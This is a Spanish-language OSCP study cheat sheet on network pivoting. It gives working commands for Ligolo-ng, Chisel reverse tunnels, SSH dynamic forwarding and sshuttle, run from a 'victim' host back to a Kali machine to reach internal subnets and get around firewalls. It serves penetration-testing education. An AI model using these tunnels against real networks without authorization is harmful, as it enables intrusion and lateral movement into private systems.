Port Forwarding & Pivoting¶

[!important] THE GATEKEEPER SKILL En OSCP, si no sabes hacer pivoting, no puedes pasar la parte de Active Directory. Tu objetivo es "traer" la red interna de la víctima a tu máquina Kali (Dynamic Port Forwarding) o exponer un puerto específico (Local/Remote Port Forwarding).

1. Top Picks (Herramientas Recomendadas)¶

Tool	Uso Principal	Ventaja
Ligolo-ng	Full VPN-like pivoting	Interfaz TUN real, no necesitas proxychains. Rápido y estable.
Chisel	SOCKS5 Proxy / Port Fwd	Binario único (Go), funciona en Windows/Linux. Fiable.
SSH	Dynamic / Local Fwd	Nativo en Linux. No requiere subir binarios.

2. Ligolo-ng (Modern Way)¶

La mejor opción si puedes subir archivos.

Setup (Kali)Agent (Victim)

Crear Interfaz: sudo ip tuntap add user kali mode tun ligolo
Levantar Interfaz: sudo ip link set ligolo up

Iniciar Proxy:

./proxy -selfcert -laddr 0.0.0.0:443 -allow-domains 10.10.x.x/24

Conectar a Kali:

./agent.exe -connect <KALI_IP>:443 -ignore-cert

En Kali: Verás "Agent joined".

Activar Ruta:

# En la consola de ligolo
session 1
start
# En otra terminal de Kali (añadir ruta)
sudo ip route add 172.16.x.0/24 dev ligolo

[!success] Result: Ahora puedes hacer nmap -sT -p 445 172.16.x.5 directamente. Sin Proxychains.

3. Chisel (The Standard)¶

SOCKS5 Proxy robusto sobre HTTP.

Server (Kali)Client (Victim)Port Forward (Specific)

Recibimos la conexión (Reverse Tunnel).

./chisel server -p 8000 --reverse

Conectamos hacia Kali y abrimos el tunnel SOCKS.

# Windows/Linux
./chisel client <KALI_IP>:8000 R:socks

[!note] Configurar Proxychains Edita /etc/proxychains4.conf: socks5 127.0.0.1 1080

Uso: proxychains nmap -sT ... (LENTO pero funciona).

Si solo quieres exponer el puerto 445 de la víctima interna (172.16.1.50) en tu Kali (puerto 4455).

# Client
./chisel client <KALI_IP>:8000 R:4455:172.16.1.50:445

4. SSH Pivot (Living off the Land)¶

Si la máquina pivote es Linux y tienes credenciales SSH.

Dynamic (SOCKS)sshuttle (VPN-like)

Abre un puerto SOCKS en tu Kali (9050).

ssh -D 9050 user@<PIVOT_IP>

Configura proxychains con socks4 127.0.0.1 9050.

Magia para Linux-to-Linux. No requiere proxychains.

sshuttle -r user@<PIVOT_IP> 172.16.x.0/24

5. Troubleshooting Pivot¶

[!failure] Connection Refused Firewall de Windows bloqueando el puerto de entrada? Fix: Usa Chisel en modo Reverse (Victim -> Kali), los firewalls suelen permitir salida.

[!warning] Nmap is super slow via Proxychains NUNCA hagas scans SYN (-sS) por proxychains. Falla. Usa siempre TCP Connect (-sT) y reduce timeouts: proxychains nmap -sT -Pn -n --top-ports 20 <TARGET>